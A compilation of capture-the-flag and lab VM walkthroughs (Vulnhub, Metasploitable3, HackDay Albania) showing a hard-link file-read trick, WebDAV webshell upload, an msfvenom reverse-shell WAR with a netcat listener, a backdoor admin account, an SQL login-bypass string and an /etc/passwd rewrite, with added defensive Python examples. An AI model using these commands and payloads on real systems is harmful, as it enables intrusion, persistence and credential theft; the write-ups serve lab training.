Great! Printing file contents...
Win, here's your flag:
So based on this it looked like I may be able to read the file by pointing the binary at another name without ‘flag’ in it, created as a hard link to the flag (the binary only rejects symbolic links).
$ cd /tmp
$ ln /home/vulnhub/flag.txt test
$ cd /home/vulnhub/
$ ./reader /tmp/test
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag:
FLAG{its_A_ph0t0_ph1ni5h}
Sweet, it worked! There are likely other paths but this worked for me.
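The reader binary checks the name it is given: no symbolic links, no ‘flag’ in the path. A hard link is the same inode under a different name, so both checks pass. The helper below is an added example (not the CTF's binary; names are mine) of checking file identity instead of file name: it opens with O_NOFOLLOW, fstat()s the descriptor it will actually read from, and compares device and inode numbers against the protected file, also refusing anything with more than one link. The temporary directory layout built in run_demo() is constructed.

```python
import os
import stat
import tempfile


class ReadDenied(Exception):
    """Raised when the requested path resolves to something we must not disclose."""


def safe_read(path, protected):
    """Read `path` only if it is a regular file with a single link that is not
    the protected file under another name. Identity comes from the open
    descriptor (fstat), so the check and the read cannot be raced apart."""
    prot = os.stat(protected)
    # O_NOFOLLOW makes open() fail with ELOOP on a symlink instead of following it
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise ReadDenied("not a regular file")
        if (st.st_dev, st.st_ino) == (prot.st_dev, prot.st_ino):
            raise ReadDenied("same inode as the protected file (hard link?)")
        if st.st_nlink > 1:
            raise ReadDenied("file has more than one link")
        return os.read(fd, st.st_size)
    finally:
        os.close(fd)


def run_demo():
    """Constructed layout: a protected flag.txt, a hard link and a symlink to it,
    and an ordinary file. Returns what safe_read() did for each."""
    d = tempfile.mkdtemp()
    flag, notes = os.path.join(d, "flag.txt"), os.path.join(d, "notes.txt")
    with open(flag, "w") as fh:
        fh.write("FLAG{constructed}")
    with open(notes, "w") as fh:
        fh.write("nothing secret here")
    hard, soft = os.path.join(d, "test"), os.path.join(d, "link")
    os.link(flag, hard)     # the write-up's trick: `ln flag.txt test`
    os.symlink(flag, soft)  # what the original binary already rejects
    results = {}
    for label, target in (("regular", notes), ("hardlink", hard), ("symlink", soft)):
        try:
            results[label] = safe_read(target, flag).decode()
        except ReadDenied as err:
            results[label] = f"denied: {err}"
        except OSError as err:
            results[label] = f"open failed: {err.strerror}"
    return results
```

A name-based blocklist (‘flag’ in the path) is the wrong identity for a file; the inode is the right one, and checking it on the already-open descriptor also removes the window between the check and the read.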
Thanks to superkojiman for putting this CTF together and making it available via Vulnhub. As always thanks to g0tmi1k and the entire Vulnhub team for maintaining these resources.
I was excited to see the latest version of Metasploitable provided us with a vulnerable Windows target to practice on. Building and configuring was not difficult once you have all of the dependencies down. I won’t get too deep into building the box but here are the basics of what I did:
Using a fresh install of Windows 10 I downloaded VirtualBox 5.0.30, Vagrant 1.8.7 and the latest version of Packer 0.12.0.
I decided to be lazy and use the included Powershell script to auto-build it, I just had to make the following dependency changes in the script so it would run.
I let this run for a while to pull in all of the configurations. Once it completed I loaded the box in VirtualBox and logged in with the credentials vagrant/vagrant to make sure it was working properly. I then exported it from VirtualBox as an .ova and imported it into my VMware lab setup.
If you have any issues with the set up feel free to leave a comment or hit me up on Twitter.
Here’s a quick walk through for one path to local access as well as privilege escalation using mostly manual techniques.
I started off with an nmap scan of all ports to identify running services.
root@mrb3n:~# nmap -sV -p- -T4 192.168.253.143
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-03 17:22 EST
Nmap scan report for 192.168.253.143
Host is up (0.00038s latency).
Not shown: 65518 filtered ports
PORT      STATE SERVICE           VERSION
21/tcp    open  ftp               Microsoft ftpd
22/tcp    open  ssh               OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
1617/tcp  open  unknown
3000/tcp  open  http              WEBrick httpd 1.3.1 (Ruby 2.3.1 (2016-04-26))
4848/tcp  open  ssl/appserv-http?
5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
8022/tcp  open  http              Apache Tomcat/Coyote JSP engine 1.1
8080/tcp  open  http-proxy        GlassFish Server Open Source Edition 4.0
8282/tcp  open  http              Apache Tomcat/Coyote JSP engine 1.1
8484/tcp  open  http              Jetty winstone-2.8
8585/tcp  open  http              Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
9200/tcp  open  wap-wsp?
49153/tcp open  msrpc             Microsoft Windows RPC
49154/tcp open  msrpc             Microsoft Windows RPC
49231/tcp open  unknown
49235/tcp open  unknown
Port 8585 caught my eye as this could be a WAMP installation with webdav possibly enabled.
I browsed to the URL and saw an uploads directory right away, this looked promising.
There is nothing in our uploads directory…yet…
Using Cadaver, a command-line WebDAV client, I was able to upload the following simple PHP webshell unauthenticated. This webshell lets you run one-off commands and is pretty cumbersome/tedious to work with but it's a start!
root@mrb3n:~/Desktop/metasploitable3# cadaver http://192.168.253.143:8585/uploads/
dav:/uploads/> put shell.php
Uploading shell.php to `/uploads/shell.php':
Progress: [=============================>] 100.0% of 38 bytes succeeded.
dav:/uploads/>
A quick test to confirm command execution:
root@mrb3n:~/Desktop/metasploitable3# curl http://192.168.253.143:8585/uploads/shell.php?e=ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection 4:
   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::ad02:4595:821a:bb65%16
   IPv4 Address. . . . . . . . . . . : 192.168.253.143
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . :

Ethernet adapter Local Area Connection 3:
   Connection-specific DNS Suffix  . : localdomain
   Link-local IPv6 Address . . . . . : fe80::69d3:300:90dd:c46%15
   IPv4 Address. . . . . . . . . . . : 192.168.110.140
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.110.2

Tunnel adapter isatap.localdomain:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain
I decided to use Weevely to generate a semi-interactive web shell and uploaded it to the target.
root@mrb3n:~/Desktop/metasploitable3# weevely generate pass123 /root/Desktop/metasploitable3/weevely.php
Generated backdoor with password 'pass123' in '/root/Desktop/metasploitable3/weevely.php' of 1446 byte size.
root@mrb3n:~/Desktop/metasploitable3# weevely http://192.168.253.143:8585/uploads/weevely.php pass123
[+] weevely 3.2.0
[+] Target:  192.168.253.143:8585
[+] Session: /root/.weevely/sessions/192.168.253.143/weevely_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
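From the defender's side, this upload-then-execute sequence stands out in the Apache access log: a successful PUT of a .php (or .jsp, .asp) file into a WebDAV-writable directory, followed by requests to that same path. The detector below is an added example, not part of the write-up; the log lines are constructed to resemble this session (the common log format layout is assumed) and the function names are mine.

```python
import re

# Apache common/combined log format (assumed); only the first seven fields matter here.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")

# Constructed log lines modelled on the session in the write-up.
SAMPLE_LOG = """\
192.168.253.130 - - [03/Dec/2016:17:40:01 -0500] "OPTIONS /uploads/ HTTP/1.1" 200 -
192.168.253.130 - - [03/Dec/2016:17:40:02 -0500] "PUT /uploads/shell.php HTTP/1.1" 201 -
192.168.253.130 - - [03/Dec/2016:17:40:15 -0500] "GET /uploads/shell.php?e=ipconfig HTTP/1.1" 200 512
192.168.253.130 - - [03/Dec/2016:17:41:00 -0500] "PUT /uploads/weevely.php HTTP/1.1" 201 -
192.168.253.130 - - [03/Dec/2016:17:41:05 -0500] "POST /uploads/weevely.php HTTP/1.1" 200 88
192.168.253.50 - - [03/Dec/2016:17:42:00 -0500] "PUT /uploads/report.pdf HTTP/1.1" 201 -
192.168.253.51 - - [03/Dec/2016:17:43:00 -0500] "GET /index.php HTTP/1.1" 200 1024
"""


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_script_uploads(lines):
    """One alert per successful PUT of a script file, with every later request
    to that path attached, so the analyst sees upload and use together."""
    alerts, by_path = [], {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        base = rec["path"].split("?", 1)[0]
        if (rec["method"] == "PUT" and rec["status"].startswith("2")
                and base.lower().endswith(SCRIPT_EXT)):
            alert = {"ip": rec["ip"], "path": base, "time": rec["ts"], "follow_ups": []}
            by_path[base] = alert
            alerts.append(alert)
        elif base in by_path and rec["method"] != "PUT":
            by_path[base]["follow_ups"].append((rec["ip"], rec["method"], rec["path"]))
    return alerts


def run_demo():
    """Run the detector over the constructed log; returns the alert list."""
    return find_script_uploads(SAMPLE_LOG.splitlines())
```

The PUT of report.pdf is deliberately not flagged: the signal is an executable extension landing in a directory the server will then run it from, which is also the configuration to fix (no PUT on directories under the script handler, or no script execution in upload directories).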
A netstat showed me multiple additional ports listening which explains the second NIC in the ipconfig command results earlier.
I had a look around at what other services are installed. Digging into the ‘Apache Software Foundation’ directory we find a Tomcat install along with the tomcat-users.xml file with cleartext credentials for the tomcat manager.
metasploitable3:C:\wamp\www\uploads $ cd "C:\Program Files"
metasploitable3:C:\Program Files $ dir
 Volume in drive C is Windows 2008R2
 Volume Serial Number is AC30-8D23

 Directory of C:\Program Files

12/02/2016  09:26 PM    <DIR>          .
12/02/2016  09:26 PM    <DIR>          ..
12/02/2016  08:47 PM    <DIR>          7-Zip
12/02/2016  08:55 PM    <DIR>          Apache Software Foundation
07/13/2009  07:20 PM    <DIR>          Common Files
12/02/2016  09:26 PM    <DIR>          elasticsearch-1.1.1
11/20/2010  07:33 PM    <DIR>          Internet Explorer
12/02/2016  08:55 PM    <DIR>          Java
12/02/2016  08:58 PM    <DIR>          jenkins
12/02/2016  09:02 PM    <DIR>          jmx
11/26/2016  12:54 AM    <DIR>          OpenSSH
11/26/2016  12:54 AM    <DIR>          Oracle
12/02/2016  09:11 PM    <DIR>          Rails_Server
12/02/2016  08:48 PM    <DIR>          Reference Assemblies
11/20/2010  07:33 PM    <DIR>          Windows Mail
07/13/2009  09:37 PM    <DIR>          Windows NT
12/02/2016  09:01 PM    <DIR>          wordpress
The server.xml file tells us that Tomcat is running on port 8282:
metasploitable3:C:\Program Files\Apache Software Foundation\tomcat\apache-tomcat-8.0.33\conf $ more server.xml
<?xml version='1.0' encoding='utf-8'?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at
..........................snip...............................................
    <!-- A "Connector" represents an endpoint by which requests are received
         and responses are returned. Documentation at :
         Java HTTP Connector: /docs/config/http.html (blocking & non-blocking)
         Java AJP  Connector: /docs/config/ajp.html
         APR (HTTP/AJP) Connector: /docs/apr.html
         Define a non-SSL/TLS HTTP/1.1 Connector on port 8080
    -->
    <Connector port="8282" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />
    <!-- A "Connector" using the shared thread pool--
Logging in to the Tomcat manager with the credentials sploit:sploit I am able to deploy a malicious WAR file to obtain a reverse shell.
I create a WAR backdoor using msfvenom and unpack it to get the filename of the corresponding .jsp file.
root@mrb3n:~/Desktop/metasploitable3# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.253.130 LPORT=8443 -f war > shell.war
I deployed the WAR file and confirmed it was successful.
Browsing directly to the directory does not yield us anything, we still need to specify the exact .jsp file.
I next set up a netcat listener and browsed to: http://192.168.253.143:8282/shell/fmzbtohe.jsp
root@mrb3n:~/Desktop/metasploitable3# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.253.130] from (UNKNOWN) [192.168.253.143] 51065
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
I got a hit on my listener and, hey, a SYSTEM shell.
C:\Program Files\Apache SoftwareFoundation\tomcat\apache-tomcat-8.0.33>whoami
whoami
nt authority\system
I added an administrative user next to set up some persistence.
C:\Program Files\Apache SoftwareFoundation\tomcat\apache-tomcat-8.0.33>net user benr pass123 /add
net user benr pass123 /add
The command completed successfully.
C:\Program Files\Apache SoftwareFoundation\tomcat\apache-tomcat-8.0.33>net localgroup administrators benr /add
net localgroup administrators benr /add
The command completed successfully.
To get at the other services we need a route to the 192.168.110.0/24 subnet. I set up some SSH port forwarding using my new administrative user.
I edited /etc/proxychains.conf and could then reach all of the services on that subnet, such as terminal services.
root@mrb3n:~/Desktop/metasploitable3# proxychains nmap -P0 -sT -p 3389 --open -oN tcp.nmap 192.168.110.140
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-04 12:26 EST
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Host Discovery
Parallel DNS resolution of 1 host. Timing: About 0.00% done
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Nmap scan report for 192.168.110.140
Host is up (0.0091s latency).
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
I confirmed that I could log in:
root@mrb3n:~# proxychains rdesktop 192.168.110.140
ProxyChains-3.1 (http://proxychains.sf.net)
Autoselected keyboard map en-us
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Connection established using SSL.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
ERROR: SSL_read: 5 (Success)
Disconnected due to network error, retrying to reconnect for 70 minutes.
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.110.140:3389-<><>-OK
Connection established using SSL.
This was just one quick and easy way to local access and ultimately to escalate privileges to SYSTEM. I will add to this post in the future to highlight other paths without the use of Metasploit. I will also do a separate post on the many ways of using Metasploit, because it is a great tool/way to start and gain confidence, but it should not replace honing your manual exploitation skill set.
The readme comes with the following note: Note: VMware users may have issues with the network interface going down by default. We recommend (for once!) using Virtualbox.
Well, with a few steps we can get this working on VMware.
I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:
1) sudo su
2) mount /dev/sda1 /mnt
3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
4) vim /mnt/etc/default/grub and edit the line GRUB_CMDLINE_LINUX="" to read: GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
5) Power off
6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
8) In this shell type "update-grub" then type "exit"
9) Select "execute a shell in the installer environment", then "poweroff"
10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD.
Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.
h/t to knightmare for pointing me towards this article:
Once that was done I was off and running. Started off with an nmap scan which gave me SSH and an Apache web server on a non-standard port.
root@mrb3n:~/Desktop# nmap -p- -T4 192.168.253.136
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-11-19 19:45 EST
SYN Stealth Scan Timing: About 12.53% done; ETC: 20:00 (0:13:02 remaining)
Nmap scan report for 192.168.253.136
Host is up (0.00021s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
8008/tcp open http
MAC Address:00:0C:29:86:05:34(VMware)
Well, the whole web app is in Albanian so this will be an extra challenge.
root@mrb3n:~# curl -s http://192.168.253.136:8008/
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>HackDayAlbania2016</title><link rel="stylesheet" href="js/jquery-ui.css"><script src="js/jquery-3.1.1.min.js"></script><script src="js/jquery-ui.js"></script><style type="text/css">
body {
background-image: url("bg.png");
background-repeat:no-repeat;
background-size: cover;}.ui-draggable .ui-dialog-titlebar{
background-color:#f05b43;}.ui-dialog .ui-dialog-title{
color: white;}</style><script>
$(document).ready(function(){
$("#dialog").dialog();});</script></head><body><div id="dialog" title="Miresevini"><p>Ne qofte se jam UNE, e di se ku te shkoj ;)</p></div><!--OK ok, por jo ketu :)--></body>
A few very rough translations thanks to Google translate:
Miresevini = Welcome
Ne qofte se jam UNE, e di se ku te shkoj = If I am, I know where to go ;)
OK ok, por jo ketu = Ok ok, but not here
I fired Dirb against it and got a robots.txt file and not much else.
root@mrb3n:~# dirb http://192.168.253.136:8008/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Nov 19 22:25:48 2016
URL_BASE: http://192.168.253.136:8008/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.253.136:8008/ ----
+ http://192.168.253.136:8008/index.html (CODE:200|SIZE:750)
==> DIRECTORY: http://192.168.253.136:8008/js/
+ http://192.168.253.136:8008/robots.txt (CODE:200|SIZE:702)
+ http://192.168.253.136:8008/server-status (CODE:403|SIZE:305)

---- Entering directory: http://192.168.253.136:8008/js/ ----
==> DIRECTORY: http://192.168.253.136:8008/js/external/
==> DIRECTORY: http://192.168.253.136:8008/js/images/
+ http://192.168.253.136:8008/js/index.html (CODE:200|SIZE:165)

---- Entering directory: http://192.168.253.136:8008/js/external/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.253.136:8008/js/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Nov 19 22:25:51 2016
DOWNLOADED: 9224 - FOUND: 4
All but one of the entries in robots.txt give us the same error message; the odd one out is /unisxcudkqjydw
Checking it out gives us a hint to another directory:
root@mrb3n:~# curl -s http://192.168.253.136:8008/unisxcudkqjydw/
IS there any /vulnbank/in there ???
Vulnbank is where we want to be:
root@mrb3n:~# curl -L http://192.168.253.136:8008/unisxcudkqjydw/vulnbank
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /unisxcudkqjydw/vulnbank</title>
</head>
<body>
<h1>Index of /unisxcudkqjydw/vulnbank</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/unisxcudkqjydw/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="client/">client/</a></td><td align="right">2016-05-23 00:27 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.253.136 Port 8008</address>
</body></html>
I move onward to the ‘client’ directory and am presented with a login page for the Very Secure Bank.
I throw a single quote in the username field and get the following error message:
I’m feeling lazy so I throw it into sqlmap, but something is being filtered on the back end. Aside from confirming the SQLi I couldn’t get sqlmap to work, with or without tamper scripts, so I turned to Burp.
root@mrb3n:~# sqlmap -u 'http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/login.php' --data='username=*&password=test' --dbms=mysql --risk=3 --level=5 --dbs
...snip...
[22:48:52] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[22:48:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)'
[22:49:03] [INFO] (custom) POST parameter '#1*' seems to be 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)' injectable
Fuzzing with Burp Intruder shows me that certain keywords appear to be filtered such as ‘AND’ and ‘OR’.
Perhaps we can bypass the login?
Statements such as ' OR 'a'='a' would not work because of the keyword filtering, and special characters appeared to be filtered as well. After many, many fuzzing attempts I was finally able to log in directly with the following string: '%20#;--%20-, which is the following without the URL encoding:
' #;-- -
Basically, the single quote closes the username string and the # comments out the rest of the query, so the password check never runs and I am logged in directly as the first user in the database. The application executes a query such as this:
"SELECT * FROM users WHERE username='$username' AND password='$password'"
but it terminates after the username check, with the remainder of the query commented out. All you actually need is the '%20#, since everything after the # is superfluous.
I tried to upload a .php file but received the following error:
OK, lets try with a jpg file. I grabbed a php reverse shell and renamed it with a jpg extension and the system seemed to like it:
The page source gave me the location of the file:
I started a netcat listener and browsed to the file located at:
I found the MySQL root password in the config.php file, but it did not work, and neither did any of the passwords in the database. I fired off SSH brute-forcing with Hydra against the ‘taviso’ user and went about my enumeration.
A search for world-writeable files showed that /etc/passwd was writeable.
www-data@hackday:/tmp$ find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
/etc/passwd
.........snip.........
Well, I should be able to edit this file and either set a new root password, add a user or change this user’s password. Let’s change taviso’s password.
I then grabbed the /etc/passwd file and created a quick shell script offline that would just echo out the contents of the file without losing any special characters:
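As a defender-side counterpart to the find command above, here is an added example (my own code, not from the VM or the original post): a Python audit that walks a tree the way find -perm -2 -type f does, prunes the pseudo filesystems, and separates world-writable files that are known sensitive system files from the rest. The SENSITIVE shortlist and the build_demo_tree() fixture are constructed so the audit can be exercised offline against a fake root instead of a live box.

```python
import os
import stat
import tempfile

# Files whose other-write bit is a direct path to root; constructed shortlist
# for illustration, not an exhaustive policy.
SENSITIVE = {"/etc/passwd", "/etc/shadow", "/etc/group", "/etc/sudoers", "/etc/crontab"}
SKIP_PREFIXES = ("/proc", "/sys", "/dev")


def is_world_writable(path):
    """True for a regular file with the other-write bit set (find -perm -2 -type f)."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def find_world_writable(root="/", skip_prefixes=SKIP_PREFIXES):
    """Walk root and return every world-writable regular file, pruning pseudo filesystems."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(skip_prefixes):
            dirnames[:] = []  # prune: nothing under /proc, /sys or /dev matters here
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_world_writable(path):
                hits.append(path)
    return sorted(hits)


def classify(paths, root="/", sensitive=SENSITIVE):
    """Split hits into known sensitive system files and everything else. Paths are
    expressed relative to root so a test tree can stand in for a real filesystem."""
    critical, other = [], []
    for p in paths:
        virtual = "/" + os.path.relpath(p, root).replace(os.sep, "/")
        (critical if virtual in sensitive else other).append(p)
    return critical, other


def build_demo_tree():
    """Constructed fixture: a tiny fake root with one world-writable /etc/passwd
    (the misconfiguration seen on the VM) and one normal /etc/hosts.
    Returns (root, passwd_path, hosts_path)."""
    root = tempfile.mkdtemp(prefix="wwaudit-")
    etc = os.path.join(root, "etc")
    os.mkdir(etc)
    passwd = os.path.join(etc, "passwd")
    hosts = os.path.join(etc, "hosts")
    with open(passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    with open(hosts, "w") as f:
        f.write("127.0.0.1 localhost\n")
    os.chmod(passwd, 0o666)
    os.chmod(hosts, 0o644)
    return root, passwd, hosts


if __name__ == "__main__":
    root, _, _ = build_demo_tree()
    critical, other = classify(find_world_writable(root), root=root)
    print("CRITICAL:", critical)
    print("other   :", other)
```

Run it with root="/" on a real host and the critical list is what to fix first; anything in that list lets an unprivileged local user rewrite accounts or scheduled jobs, exactly the step taken against this VM.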
Now I should be able to su to the user ‘taviso’ and from there elevate to root.
www-data@hackday:/tmp$ su taviso
su taviso
Password: pass123
taviso@hackday:/tmp$
Cool, that worked. Now we verify our sudo permissions for laughs. The user can perform any actions as root. Score!
taviso@hackday:/tmp$ sudo -l
[sudo] password for taviso:
Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User taviso may run the following commands on hackday:
    (ALL : ALL) ALL
Now we just su to root and grab our prize:
taviso@hackday:/tmp$ sudo su
sudo su
[sudo] password for taviso: pass123
root@hackday:/tmp#
Google translate told me the flag text translates to “Congratulations, now the report begins.”
The md5 was a hash of “rio”.
Now for the heck of it I could SSH in directly as the ‘taviso’ user and have a further look around.
root@mrb3n:~# ssh taviso@192.168.253.138
taviso@192.168.253.138's password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
6 packages can be updated.
2 updates are security updates.
Last login: Sat Oct 29 23:07:00 2016
taviso@hackday:~$ sudo su
[sudo] password for taviso:
root@hackday:/home/taviso#
Here is the function in config.php responsible for the authentication bypass. Sanitize your input!
function check_login($username, $password) {
    // Blacklist filter: a single case-insensitive pass per keyword
    $username = str_ireplace("OR", "", $username);
    $username = str_ireplace("UNION", "", $username);
    $username = str_ireplace("AND", "", $username);
    $password = str_ireplace("'", "", $password);
    // Username is interpolated unquoted-safe into the query: a ' closes the literal
    $sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
    $result = mysqli_fetch_assoc(execute_query($sql_query));
    $result = $result["ID"];
    if ($result >= 1) { return $result; } else { return -1; }
}
And the MySQL credentials in cleartext in the config.php file:
function execute_query($sql) {
    $db_host = "127.0.0.1";
    $db_name = "bank_database";
    $db_user = "root";
    $db_password = "NuCiGoGo321";
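To make the failure of the check_login() filter above concrete, here is an added example (my own code, not the VM’s): the same blacklist ported to Python and run against an in-memory SQLite table standing in for the MySQL klienti table, beside a version that uses bound parameters. Assumptions: the rows are constructed, and SQLite’s -- comment is used where the post’s payload relied on MySQL’s #; the shape of the bypass is otherwise the one described above (a quote closes the username literal and the password clause is commented away).

```python
import re
import sqlite3

# Constructed sample rows (not data from the VM); same columns as the page's
# klienti table: ID, username, password.
SAMPLE_USERS = [("victor", "s3cret"), ("taviso", "hunter2")]


def make_db():
    """In-memory SQLite database standing in for the MySQL bank_database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE klienti (ID INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO klienti (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def blacklist(username, password):
    """Port of the page's filter: one case-insensitive pass removing OR, UNION
    and AND from the username, and single quotes from the password."""
    for word in ("OR", "UNION", "AND"):
        username = re.sub(re.escape(word), "", username, flags=re.IGNORECASE)
    password = password.replace("'", "")
    return username, password


def vulnerable_check_login(conn, username, password):
    """Mirror of check_login(): filter, then interpolate straight into the SQL.
    Returns the row ID on success, -1 otherwise, like the PHP original."""
    username, password = blacklist(username, password)
    # A quote in the username closes the string literal; everything after the
    # comment marker (-- in SQLite, # in MySQL) is dropped, password clause
    # included. The blacklist never looked at either character.
    sql = (
        f"SELECT ID FROM klienti WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else -1


def safe_check_login(conn, username, password):
    """Hardened version: bound parameters, so input is data, never query text.
    (Passwords should be stored hashed as well; plaintext is kept here only to
    mirror the page's schema.)"""
    sql = "SELECT ID FROM klienti WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else -1


if __name__ == "__main__":
    conn = make_db()
    bypass = "taviso' -- -"  # the post's payload shape with SQLite's comment token
    print("vulnerable, bypass :", vulnerable_check_login(conn, bypass, "wrong"))
    print("safe, bypass       :", safe_check_login(conn, bypass, "wrong"))
    # Collateral damage of the blacklist: 'victor' loses its 'or' and can no
    # longer log in at all, even with the right password.
    print("vulnerable, victor :", vulnerable_check_login(conn, "victor", "s3cret"))
    print("safe, victor       :", safe_check_login(conn, "victor", "s3cret"))
```

The second pair of calls is the part a blacklist discussion usually skips: the filter not only fails to stop the quote, it also mangles legitimate usernames that happen to contain “or” or “and”, so the fix is parameterization, not a longer keyword list.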
Enjoyable VM with a privilege escalation method I hadn’t seen on Vulhub yet. Thanks to r_73en for putting it together and sharing as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.
When knightmare asked me to test his latest boot2root based around Scottish culture/slang I jumped at the opportunity. Having chatted quite a bit and debugging issues on other VMs I had already picked up several colorful Scottish expressions but boy was I in for a ride!
As always I imported the VM and fired off an nmap scan. This one only gave me port 80 to work with.
Hitting the web server I was greeted by Willie from the Simpsons telling me to stay out of his server, we’ll see about that.
I checked the page source and noted down several hints including possible usernames and directories.
Images will open doors. Perhaps some stego or exif madness? I grabbed all the images down locally to have a look.
Amazing shot!
Well, the ‘flicks’ directory was forbidden:
…and the ‘telly’ directory gave me more clues (and confusion):
More hints. At this point my head was spinning!
Focusing on the phpinfo hint I tried browsing to /flicks/phpinfo.php but that would be too easy. Firing off Burp intruder with a list of known file extensions finally got me a hit for phpinfo.pht. Nice troll.
Sure enough I was able to use this technique to gain command execution:
I uploaded a PHP reverse shell but could not get it working (I’d come to find out why later on).
Turning to this great reverse shell cheat sheet I decided to use the trusty mknod technique to fire myself a reverse shell.
Ok, now we’re in as www-data:
